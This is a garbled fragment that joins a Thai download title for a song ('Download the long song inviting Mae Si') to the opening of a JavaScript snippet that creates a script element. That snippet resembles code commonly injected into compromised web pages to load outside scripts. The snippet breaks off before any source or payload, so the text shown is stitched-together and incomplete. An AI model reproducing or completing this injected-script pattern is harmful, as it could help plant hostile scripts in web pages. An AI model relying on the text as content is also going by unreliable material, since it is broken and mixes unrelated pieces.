ดาวน์โหลด เพลงยาวเชิญแม่สีvar d=document;var s=d.createElement(‘script’);